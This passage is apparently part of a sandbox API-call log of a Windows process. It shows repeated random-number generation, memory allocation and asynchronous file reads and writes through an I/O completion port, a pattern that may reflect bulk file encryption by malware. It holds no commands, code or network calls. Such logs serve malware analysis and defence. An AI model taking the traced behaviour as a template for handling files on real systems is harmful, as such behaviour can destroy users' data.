pbBuffer=0x30ef970) returned 0x0 [0168.213] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.213] free (_Block=0x3e305b8) [0168.213] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.214] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.214] free (_Block=0x1fa91d0) [0168.214] free (_Block=0x1fa2ed8) [0168.214] free (_Block=0x1fa90b8) [0168.214] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0168.214] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.221] WriteFile (in: hFile=0x338, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x7c10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0168.222] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.228] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x7ce0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0168.238] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.247] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0168.248] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.248] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.248] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0168.248] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.248] free (_Block=0x3e305b8) [0168.248] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.248] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.249] free (_Block=0x1fa91d0) [0168.249] free (_Block=0x1fa2ed8) [0168.249] free (_Block=0x1fa90b8) [0168.249] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0168.249] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.250] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.250] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0168.528] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x7ce0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0168.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0169.764] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x7f70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0169.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0170.966] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7e90, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0170.971] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0170.979] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x6090, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0170.979] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0170.988] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x87a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0170.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0170.992] ReadFile (in: hFile=0x2a4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x64c7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0170.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0172.792] CloseHandle (hObject=0xec) returned 1 [0172.792] free (_Block=0x1ff1e60) [0172.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0172.844] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xf438, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.079] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.338] CloseHandle (hObject=0x170) returned 1 [0173.338] free (_Block=0x3d70450) [0173.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.390] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.391] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.391] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.391] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.391] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.391] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.392] free (_Block=0x3e305b8) [0173.392] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.392] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.392] free (_Block=0x1fa91d0) [0173.392] free (_Block=0x1fa2ed8) [0173.392] free (_Block=0x1fa90b8) [0173.392] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.401] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.402] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.402] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.402] free (_Block=0x3e305b8) [0173.402] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.402] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.403] free (_Block=0x1fa91d0) [0173.403] free (_Block=0x1fa2ed8) [0173.403] free (_Block=0x1fa90b8) [0173.403] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.403] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.412] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.412] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.412] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.413] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.413] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.413] free (_Block=0x3e305b8) [0173.413] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.413] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.413] free (_Block=0x1fa91d0) [0173.413] free (_Block=0x1fa2ed8) [0173.413] free (_Block=0x1fa90b8) [0173.413] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0173.414] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.509] CloseHandle (hObject=0x2a4) returned 1 [0173.509] free (_Block=0x1ff1e60) [0173.509] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.510] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.510] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.510] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.511] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.511] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.511] free (_Block=0x3e305b8) [0173.511] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.511] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.511] free (_Block=0x1fa91d0) [0173.511] free (_Block=0x1fa2ed8) [0173.511] free (_Block=0x1fa90b8) [0173.511] WriteFile (in: hFile=0x308, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0173.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.512] WriteFile (in: hFile=0x308, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x3220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0173.512] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.547] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xef6, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0173.547] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.553] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7aac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0173.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.565] CloseHandle (hObject=0x2a4) returned 1 [0173.565] free (_Block=0x3d70450) [0173.565] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.574] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.574] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.580] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xe0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.580] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.591] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.591] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.591] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.591] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.591] free (_Block=0x3e305b8) [0173.591] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.591] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.592] free (_Block=0x1fa91d0) [0173.592] free (_Block=0x1fa2ed8) [0173.592] free (_Block=0x1fa90b8) [0173.592] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.592] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.616] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x780, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.616] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.622] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xb20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.622] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.633] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.634] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.634] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.634] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.634] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.634] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.634] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.635] free (_Block=0x3e305b8) [0173.635] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.635] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.635] free (_Block=0x1fa91d0) [0173.635] free (_Block=0x1fa2ed8) [0173.635] free (_Block=0x1fa90b8) [0173.635] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0173.635] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0173.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.643] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.643] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0173.644] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0173.644] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0173.644] free (_Block=0x3e305b8) [0173.644] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0173.644] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0173.644] free (_Block=0x1fa91d0) [0173.644] free (_Block=0x1fa2ed8) [0173.644] free (_Block=0x1fa90b8) [0173.644] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0173.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.649] CloseHandle (hObject=0xec) returned 1 [0173.649] free (_Block=0x1ff1e60) [0173.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.650] CloseHandle (hObject=0x2a4) returned 1 [0173.651] free (_Block=0x3d70450) [0173.651] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.654] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x175f, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.658] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0173.658] CloseHandle (hObject=0x170) returned 1 [0173.658] free (_Block=0x3ef0008) [0173.658] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, 